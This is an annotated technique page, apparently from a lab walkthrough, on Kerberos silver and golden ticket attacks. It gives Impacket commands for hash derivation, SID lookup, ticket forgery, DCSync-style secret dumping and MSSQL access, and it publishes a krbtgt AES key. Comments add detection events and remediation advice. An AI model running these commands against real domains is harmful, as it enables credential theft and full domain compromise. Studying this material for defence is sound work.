Technique
1.0 Ticket Based Attacks
1.1 Silver Ticket
# Silver ticket walk-through: derive the service account's NT hash, read the
# domain SID, forge a service ticket for an MSSQL SPN, then present it to the
# SQL service from a local credential cache.
#
# Defender view: a forged service ticket is never requested from the KDC, so
# the DC logs no 4769 for it. Evidence sits on the service host: a Kerberos
# 4624 logon with no matching 4769 on any DC, RC4 tickets where AES is the
# norm, or lifetimes beyond the domain's Kerberos policy. The ticket stays
# usable until the service account's password changes, so use gMSAs or long
# random passwords and rotate after any suspected exposure.

# NT hash = MD4 over the UTF-16LE encoding of the password.
# NOTE(review): "$pass" is used as the printf format string, so a '%' or '\'
# in the password changes the bytes that get hashed; printf '%s' "$pass"
# would hash it literally. -f ASCII also rejects non-ASCII passwords.
iconv -f ASCII -t UTF-16LE <(printf "$pass") | openssl dgst -md4
# Trailing 0 is the max RID to enumerate, so this is used for the domain SID
# only (matches the "Find the domain SID" hint further down the page).
# NOTE(review): $domain/$user/$pass are inside single quotes here and on the
# mssqlclient line, so the shell passes them literally; they read as
# placeholders to fill in by hand, yet the ticketer line expands the same
# names inside double quotes. Confirm which convention is intended.
# The password is also passed in argv, so it lands in shell history and
# process listings on the testing host.
impacket-lookupsid '$domain.local/$user:$pass@evergreen' 0
# -spn makes this a service ticket for that SPN rather than a TGT; -nthash
# means an RC4-HMAC (etype 23) ticket; -user-id 1119 is the RID written into
# the forged PAC. The hash is truncated and the SID elided ("...") on the page.
impacket-ticketer -nthash "84a5092...52b93b804" -domain-sid "S-1-5-21-..." -domain "$domain.local" -spn "MSSQLSvc/$server.$domain.local" "$user" -user-id 1119
# Point Kerberos clients at the cache file named after the user.
# NOTE(review): the expansion is unquoted; a value with spaces would split.
export KRB5CCNAME=$user.ccache
# -k -no-pass authenticates with the ticket from KRB5CCNAME instead of a
# password; -target-ip pins the connection to 172.17.1.22.
impacket-mssqlclient '@$server.$domain.local' -k -no-pass -debug -target-ip 172.17.1.22 -windows-auth
1.2 Golden Ticket
# Golden ticket walk-through: pull domain secrets from a DC, then forge a TGT
# with the krbtgt key.
#
# Defender view: -just-dc extracts NTDS secrets (NT hashes and Kerberos keys)
# remotely, by default over directory replication (DRSUAPI). Watch for 4662
# events showing DS-Replication-Get-Changes / Get-Changes-All exercised by an
# account or host that is not a domain controller, and audit who holds those
# rights. A forged TGT stays usable until krbtgt has been reset twice, because
# the KDC accepts both the current and the previous key. On the wire, look for
# 4769 service-ticket requests with no preceding 4768 for the account, and for
# ticket lifetimes beyond the domain's Kerberos policy.

# NOTE(review): the target string is single-quoted, so $domain/$user/$pass/$dc
# are not expanded by the shell; they read as placeholders to fill in by hand.
# Confirm. The password is also passed in argv (shell history, process list).
impacket-secretsdump '$domain.local/$user:$pass@$dc.$domain.local' -just-dc
# No -spn, so this forges a TGT rather than a service ticket. The -aesKey
# value is 32 hex characters, i.e. an AES128 key; -user-id 1114 is the RID
# written into the PAC.
# NOTE(review): the key is published in full. If it came from a live domain
# rather than a lab, treat krbtgt as compromised and reset it twice.
impacket-ticketer -aesKey be43fd55ab73801ae4136810d5c9c757 -domain-sid "S-1-5-21-..." -domain "$domain.local" "$user" -user-id 1114
Hints
# Generic templates for the golden-ticket steps. The quoted upper-case strings
# and "$..." names are placeholders, not values from this page.
#
# Defender view: each ticketer.py call below builds the ticket offline from the
# krbtgt key, so nothing is logged at creation time. Detection happens when the
# ticket is used: 4769 with no earlier 4768 for the account, a client name that
# does not match the RID in the PAC, RC4-encrypted tickets in a domain that
# otherwise uses AES, and lifetimes beyond the Kerberos policy maximum. DCs
# that enforce PAC requestor validation are expected to reject a TGT whose
# client name does not resolve to the SID in its PAC. Recovery is a double
# reset of the krbtgt password.

# Find the domain SID (authenticates with LM:NT hashes; the trailing 0 is the
# max RID to enumerate)
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
# Create the golden ticket (with RC4 key, i.e. NT hash)
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
# Create the golden ticket (with AES 128/256bits key)
ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
# Create the golden ticket (with RC4 key, i.e. NT hash) with custom user/groups ids
# -user-id and -groups set the RID and group RIDs carried in the PAC; the
# "..." inside the -groups value is an elision, not literal input.
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -user-id "$USERID" -groups "$GROUPID1,$GROUPID2,..." "randomuser"
References